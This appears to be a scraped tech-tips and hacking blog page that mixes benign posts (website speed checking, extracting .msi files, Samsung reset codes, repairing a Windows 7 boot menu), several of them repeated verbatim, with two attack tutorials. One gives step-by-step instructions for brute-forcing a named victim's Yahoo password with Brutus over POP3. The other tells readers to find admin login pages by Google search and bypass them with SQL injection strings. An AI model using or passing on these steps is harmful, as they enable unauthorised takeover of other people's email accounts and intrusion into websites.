Latest Post
If you own a website or a blog, then you must know how important it is to have a fast loading website. Any website that opens slow or has a low speed of loading is sure to lose traffic as none of the viewers like to wait much.
It is estimated that if a page doesn’t load within 5-8 seconds you will lose 1/3 of your visitors. Thus it is very important to keep the website fast so that it takes a little time to load and display the entire page properly. Checking a website for speed and load time is not difficult, all you need is a third party service that checks it.
There are many online websites that checks the speed and load time of a website, here is one that I liked the most. The web service is called selfseo and provides a free website speed checker. All you need to do is just enter the name of the website or the page to check, click the Check button and it will display the load time (in seconds) and the speed of the website.
Moreover if you have more than one website to check, you can provide at the max 10 websites to check the speed. This feature will help you compare the load time and the speed with the other sites and your competitors.
If you find your website to be slow enough, then you should consider changing the design and post styles of your website, site structure or just move to a new and fast loading server.
Click here to Visit Website Speed Checker
It is estimated that if a page doesn’t load within 5-8 seconds you will lose 1/3 of your visitors. Thus it is very important to keep the website fast so that it takes a little time to load and display the entire page properly. Checking a website for speed and load time is not difficult, all you need is a third party service that checks it.
There are many online websites that checks the speed and load time of a website, here is one that I liked the most. The web service is called selfseo and provides a free website speed checker. All you need to do is just enter the name of the website or the page to check, click the Check button and it will display the load time (in seconds) and the speed of the website.
Moreover if you have more than one website to check, you can provide at the max 10 websites to check the speed. This feature will help you compare the load time and the speed with the other sites and your competitors.
If you find your website to be slow enough, then you should consider changing the design and post styles of your website, site structure or just move to a new and fast loading server.
Click here to Visit Website Speed Checker
Setup executable files are of many types among which there are two famous types, .msi and .exe files. Both the setup files are self extracting files which installs themselves when double clicked, thus it is bit difficult to see the contents of the setup files before installation.Every once in a while I need to extract the content of a .msi file in order to customize a deployment for a particular network environment. Sometimes initializing the .msi installer will temporarily extract the files into C:\Documents and Settings\<username>\Local Settings\Temp, but those files are removed once the installer exits.
To extract files from a .msi follow my instructions:
Step 1: Open run and type cmd..
Step 2: Type msiexec /a C:\yourfile.msi /qb TARGETDIR=G:\msi_test
Note: C:\yourfile.msi is the file which will be extracted. G:\msi_test is the folder location where the extracted files will be located. The destination directory does not need to exist prior to running this command.
Step 3: Now wait for a few seconds.. Then u will see a popup extracting files.
Step 4: It's done. Now open the target directory and check out extracted files and folders.
Step 2: Type msiexec /a C:\yourfile.msi /qb TARGETDIR=G:\msi_test
Note: C:\yourfile.msi is the file which will be extracted. G:\msi_test is the folder location where the extracted files will be located. The destination directory does not need to exist prior to running this command.
Step 3: Now wait for a few seconds.. Then u will see a popup extracting files.
Step 4: It's done. Now open the target directory and check out extracted files and folders.
Today i will show you how to hack yahoo ids by brute force attack..
Step 1: Download Brutus Force from Here and Extract it on desktop and lets start/ ok run it
Step 2: To hack email in target bar write pop.mail.yahoo.com
Step 3: Type : POP3
Step 4: Put connections to 60 and timeout to 60
Step 5: Make sure you check a ''Single User''
Step 6: Then when you check that to single user write in that bar you victims yahoo acc ID / explanation .. like hackerpilu@yahoo.com his ID will be hackerpilu.. write that
Step 7: Password mod put on: ''Brute Force''
Step 8: Then click ''Range''(a new window will pop up)
Step 9: Then make sure you put ''Min Length'' 6 and ''Max Length'' to 16
Step 10: Then put custom range .. or anything default as you want.
Step 11: Click OK
And for end click Start .. that's all .. now wait for the process to complete..
Enjoy!! and keep watching on hack in truths for more tutorials like that. I will post some tutorial about how to hack gmail account by brute force attack after my successful testing !!
These Code Reset All Code In Your Samsung Mobile(Any Model)
Samsung Tracker Code Also Reset By These Codes
If You Forget Your Code Don't Worry
>> Turn Off Your Mobile
>> Remove The SIM
>> Turn On Your Mobile Without SIM
>> Enter The Code *2767*637# (Universal Unlock Code)(Reset Mobile Tracker Code)
>> Enter The Code *2767*3855#(Full EEPROM Reset)(Reset All Type Of Code)
Hack any .asp sites with SQL Injection attack.
1st, Open Google and search for adminlogin.asp or admin\login.asp
2nd, Open any search result and you will get a login page. Use
User: Admin
Pass: 'or'1'='1
or
User: admin
Pass: ’ or 1=1–
or
User: ’ or 1=1–
Pass: ’ or 1=1–
We are using some simple SQL injection strings to hack asp sites. If you need more strings please submit your e-mail id. I will send all SQL Strings within 24 hour.
1st, Open Google and search for adminlogin.asp or admin\login.asp
2nd, Open any search result and you will get a login page. Use
User: Admin
Pass: 'or'1'='1
or
User: admin
Pass: ’ or 1=1–
or
User: ’ or 1=1–
Pass: ’ or 1=1–
We are using some simple SQL injection strings to hack asp sites. If you need more strings please submit your e-mail id. I will send all SQL Strings within 24 hour.
Repair the MBR to restore Windows 7 to your Multiboot Options
Each time you install a version of Windows, it rewrites the MBR to call its own boot loader. If you install Windows 7 (or Windows Vista) as a second operating system on a PC where Windows XP is already installed, the Windows boot menu incorporates the options from the older boot menu. But if you install a fresh copy of Windows XP (or Windows Server 2003) on a system that is already running Windows 7, you’ll overwrite the MBR with one that doesn’t recognize the Windows 7 boot loader. To repair the damage, open a Command Prompt window in the older operating system and run the following command from the Windows 7 DVD, substituting the letter of your DVD drive for X here:
X:\boot\ bootsect.exe /nt60 all
Now Restart your PC. It will boot to Windows 7. Now open your CMD and type these commands.
C:\Windows\system32\Bcdedit /create {ntldr} /d "Earlier Versions of Windows OS"
Note: In this command, Earlier Versions of Windows OS can be any text that you want. It's a Description of the OS.
C:\Windows\system32\Bcdedit /set {ntldr} device partition=D:
Note: In this command, D: is the drive letter for the active partition.
C:\Windows\system32\Bcdedit /set {ntldr} path \ntldr
C:\Windows\system32\Bcdedit /displayorder {ntldr} /addlast
Now you can find your older versions of Windows.
Each time you install a version of Windows, it rewrites the MBR to call its own boot loader. If you install Windows 7 (or Windows Vista) as a second operating system on a PC where Windows XP is already installed, the Windows boot menu incorporates the options from the older boot menu. But if you install a fresh copy of Windows XP (or Windows Server 2003) on a system that is already running Windows 7, you’ll overwrite the MBR with one that doesn’t recognize the Windows 7 boot loader. To repair the damage, open a Command Prompt window in the older operating system and run the following command from the Windows 7 DVD, substituting the letter of your DVD drive for X here:X:\boot\ bootsect.exe /nt60 all
Now Restart your PC. It will boot to Windows 7. Now open your CMD and type these commands.
C:\Windows\system32\Bcdedit /create {ntldr} /d "Earlier Versions of Windows OS"
Note: In this command, Earlier Versions of Windows OS can be any text that you want. It's a Description of the OS.
C:\Windows\system32\Bcdedit /set {ntldr} device partition=D:
Note: In this command, D: is the drive letter for the active partition.
C:\Windows\system32\Bcdedit /set {ntldr} path \ntldr
C:\Windows\system32\Bcdedit /displayorder {ntldr} /addlast
Now you can find your older versions of Windows.
Subscribe to:
Posts (Atom)
Popular Posts
-
Hack / Bypass .asp sites using SQL InjectionHack any .asp sites with SQL Injection attack. 1st, Open Google and search for adminlogin.asp or admin\login.asp 2nd, Open any searc...
-
What is Captcha ????CAPTCHA stands for C ompletely A utomated P ublic T uring test to tell C omputers and H umans A part . A CAPTCHA is a...
-
Get upto 100 MBPS Internet speed [Funny Trick]Today I will show you how to Fool your friends. They should think that you have internet connection up to 100 MBPS speed. 1 st ,...
-
WEAKERTHAN - Another OS For HackersWeakerthan 3.6 OS for Hackers Most of the hackers would have heard about Backtrack. Weakerthan is another Linux based pentesting...
-
DNN Method - Website HackingStep 1 : http://www.google.com Step 2: Now enter any of these dorks. 2nd dork is best for this type of hacking. :inurl:/tabid/36/l...
-
Hack YAHOO ids by Brute Force AttackToday i will show you how to hack yahoo ids by brute force attack.. Step 1: Download Brutus Force from Here and Extract it on desk...
-
How to Run Mobile Games on PCHow to Run Java mobile Games On PC 1st, Download KEmulator from the link bellow. 2nd, Extract and run KEmulator.exe 3rd, Goto...
-
How to Unlock your CellphoneWhat are Unlocked Cellphones? and Why anybody would want to Unlock it? An Unlocked Cellphone is one that can be used on all networks ...
-
EmbeePay - Legit or Scam ??EmbeePay is one of the most popular sites providing free mobile recharge on Facebook. There is so Many people working hard receive a free r...
-
Reset Samsung Mobile Tracker CodeThese Code Reset All Code In Your Samsung Mobile(Any Model) Samsung Tracker Code Also Reset By These Codes If You Forget Your Code...
Labels
- addone
- antivirus
- avast
- avira
- backup
- blog
- Blogger
- broadcasting
- bruteforce
- bsnl
- captcha
- Docomo
- Download
- email hacking
- excel
- Facebook App
- firefox
- freebies
- Game
- game maker
- gmail
- Google+
- Hack
- Help Desk Answer
- Internet
- iso
- Legit or Scam
- license
- Mobile
- mozila
- News
- Official Notices
- Orkut
- rapidshare
- Relaince
- Review
- security
- shell
- Software
- speed up
- SQL Attack
- Tips and Tricks
- Tools
- USB
- virus
- Wallpapers
- WebHack
- win rar
- Windows
- windows 7
- Windows XP
- wordpress
- yahoo
- Zip









